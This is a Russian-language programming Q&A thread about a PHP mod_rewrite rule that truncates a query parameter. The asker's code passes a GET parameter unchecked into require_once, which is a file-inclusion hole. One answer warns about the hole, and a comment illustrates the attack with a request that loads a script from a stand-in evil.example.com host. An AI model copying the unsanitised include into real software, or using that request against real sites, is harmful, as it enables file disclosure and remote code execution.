# ЧПУ и require_once();

Tags: php, .htaccess, mod-rewrite

Здравствуйте, столкнулся с такой проблемой.

Есть УРЛ вида `index.php?p=service&s=main`

Хотел преобразовать его в такой вид: `/service/main`

При обращении из браузера по первому варианту всё подгружается нормально. При втором варианте выскакивает:

`function.require-once
]: failed to open stream: Permission denied in Z:\home\domain.ru\www\index.php on line 33`

В .htaccess лежит следующее:

```
RewriteRule ^service/([aA-zZ]+)? index.php?p=service&s=$1 [L]
```

В чем может быть проблема?

Аналогичная конструкция mod_rewrite отрабатывает нормально.

На строке 33 лежит следующее:

```
`$path = $_GET['s'];

require_once "private/$path";
`
```

UPD.

Вывел `var_dump($_GET)`, отдало:

`array(2) { ["p"]=> string(7) "service" ["s"]=> string(4) "m[L]" }`

Т.е. почему то обрезало `s=main` до `s=m`.

===

Разобрался, забыл про последнюю правку htaccess, было так `([aA-zZ])`, а надо так `([aA-zZ]+)`

Answer (score 1, accepted):

Причина всего - тупая человеческая невнимательность.

В .htaccess не было пробела перед флагом [L], соответственно, запрос и преобразовывался в `...etc/main[L]` , и при инклюде, соответственно, пых не находил такой адрес и отдавал ошибку.

Всем спасибо за помощь!

Answer (score 0):

Что такое `[aA-zZ]`? Возможно, вы имели в виду `[A-Za-z]`?

PS без дополнительных проверок так, как сделали вы, делать нельзя. Через такой инклюд можно вытащить с сервера, к примеру, любой статический файл - что очень даже поможет злоумышленнику.

А уж если у вас еще и использование URL в качестве имени файла разрешено - то через похожие строчки (не как у вас, но очень похожие) можно вообще свой файл на сервер залить и сразу же выполнить.

Comment: Учту, спасибо. 
Интересно бы узнать механизм сего действия - через подобный запрос залить файл.

Comment: Механизм-то простой: `index.php?p=service&s=http://evil.example.com/evil-script'` Ну, может, гле-нибудь экранирования надо еще добавить. У вас такое не пройдет из-за префикса `private/` - но кто сказал, что это единственный способ?

Answer (score -1):

Надо смотреть конкретно роутер. Наперед скажу что у тебя роутер настроен на получение GET запроса - из него уже извлекается контроллер и экшн. Надо переписать код так чтоб роутер брал параметры из $_SERVER['REQUEST_URI']
Тоесть код будет выглядеть вот так:

```
$routes = explode('/', $_SERVER['REQUEST_URI']);
```

дальше что-то типо:

```
//получаем имя контроллера
if(!empty($routes[1]))
{   
    $controller_name = $routes[1];
}

//получаем имя экшена
if(!empty($routes[2]))
{
    $action_name = $routes[2];
}
```

и т.д.

Comment: Автор как бы уже написал, что у него конкретно в "роутере". Зачем вы гадаете?